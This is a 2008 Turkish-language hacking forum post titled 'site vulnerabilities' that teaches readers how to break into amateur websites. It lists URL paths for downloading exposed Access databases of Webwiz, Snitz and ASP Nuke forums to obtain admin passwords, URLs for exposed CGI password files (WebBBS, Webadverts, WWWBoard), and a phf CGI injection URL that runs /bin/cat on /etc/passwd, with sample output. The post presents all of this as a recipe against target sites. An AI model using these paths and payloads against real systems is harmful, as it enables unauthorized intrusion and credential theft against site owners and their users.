TurkisH PoweR // Türkiye'nin Paylaşım Platformu...
Would you like to react to this message? Create an account in a few clicks or log in to continue.



 
AnasayfaKapı*GaleriLatest imagesAramaKayıt OlGiriş yap

TurkisH PoweR // Türkiye'nin Paylaşım Platformu... :: TuRKiSH PoWeR TeaM :: Web & Server Güvenliği
 

 sİtE aÇıKlArI!!!

Aşağa gitmek 
YazarMesaj
$@h!n
Üye
Üye



Mesaj Sayısı : 113
Rep Puanı :
sİtE aÇıKlArI!!! Left_bar_bleue45 / 10045 / 100sİtE aÇıKlArI!!! Right_bar_bleue

Kayıt tarihi : 06/09/08

sİtE aÇıKlArI!!! Empty
MesajKonu: sİtE aÇıKlArI!!!   sİtE aÇıKlArI!!! I_icon_minitime7th Eylül 2008, 20:29
_____GUVENLIK ACIKLARI:_____

Genelde baslicalari amatör olmak üzere bircok sitede güvenlik aciklari bulabilirsiniz.Özellikle hazir asp uyelik sistemi
kullanan siteleri,mesaj boardlarini ve forumlari bu aciklar yardimiyla hackleyebilirsiniz.
Ornek olarak Webwiz forumlarini ele alalim:
www.forumunadresi.com/admin/wwwforum.mdb olarak deneyin.Eger ana database e ulasirsaniz ki eger forum yeni kurulmussa
bu fazlasiyla mümkün,gerekli sifreleri alabilirsiniz(admin ifrelerini).(sifreleri acmak icin access kullanabilirsiniz)
Snitz forumlarda da ayni islem mümkün.Mdb ye
www.forumadresi.com/snitz_forums_2000.mdb adresinden ulasabilirsiniz.
son olarak asp nuke sistemlerde
www.siteadresi.com/db/main.mdb den database’e ulasabilirsiniz.
Söyledigim gibi sitede hazir üyelik portali kullaniliyor olabilir;
bunlari aspindir.com dan bakin.Eger aynisi kullanilan bir portal görürseniz portalin upload edilmeden önceki klasör yoluna
bakin.Böylece mdb nin nerede oldugunu bulabilirsiniz.Büyük ihtimalle bunlar

/db/main.mdb
/db/uyeler.mdb
/db/members.mdb
/db/sifreler.mdb gibi

Bir sitedeki sizin bulamadiginiz muhtemel aciklari tespit edebilmek icin güvenlik tarayicilarini kullanmanizi öneririm.
Bu tarayicilardan en yaygin olanlari

.N-Stealth
.Whisker
.Retina
.twwwscan
.m3hm3t’s CGI scanner’dır.


Cgi scriptleri acigi:
WEBBS de bulunan bir acik.
http://www.hedefsite.com/cgi-bin/webBBS/profiles/ ya da color=#0000ffhttp://www.hedefsite.com/cgi-bin/webBBS/users/

Webadverts(reklam) acigi:Siteye konan reklamlarin hepsi icin ayri hesap acilir.
Siteye kendi bannerinizi koyup diger bannerlari kaldirabilirsiniz.
Açık : http://www.hedefsite.com/cgi-bin/advert/adpassword.txt

WWWBoard Scriptleri:
Açık : http://www.hedefsite.com/cgi-bin/wwwebboard.txt
Açık : http://www.hedefsite.com/cgi-bin/wwwboard.txt
Açık : color=#0000ffhttp://www.hedefsite.com/webboard/password.txt

Biraz da phfden bahsetmek istiyorum:
96’da FBI web sitesini hacklemekte kullanilan acik hala bagzi sitelerde bulunmaktadir.Size bu aciktan örnekler verecegim:
color=#0000ffhttp://KIRACAGIMIZADRES/cgi-bin/phf...0a/bin/cat%20/e tc/passwd yaziyoruz browsera.ENTER dedigimizde
error 404 gelirse bu acik kapanmistir demektir.Eger kapanmamissa karsiniza gelebilecek 2 türlü secenek var.Ya direk
passwordlerle birlikte userlari görürsünüz ya da userlarin passwordleri * biçiminde shadowed password olarak görünür.
Örnek vermek gerekirse:
www-admin:SIFRE:100:11:WWW administrator:/home/Common/WWW:/bin/csh
yada
www-admin:*:100:11:WWW administrator:/home/Common/WWW:/bin/csh
gibi.En azindan denemekte yarar oldugunu düsünüyorum.Burada www-admin yerine herhangi bir kullanici adi da yazabilir.
Sayfa başına dön Aşağa gitmek
 
sİtE aÇıKlArI!!!
Sayfa başına dön 
1 sayfadaki 1 sayfası

Bu forumun müsaadesi var:Bu forumdaki mesajlara cevap veremezsiniz
TurkisH PoweR // Türkiye'nin Paylaşım Platformu... :: TuRKiSH PoWeR TeaM :: Web & Server Güvenliği-
Buraya geçin: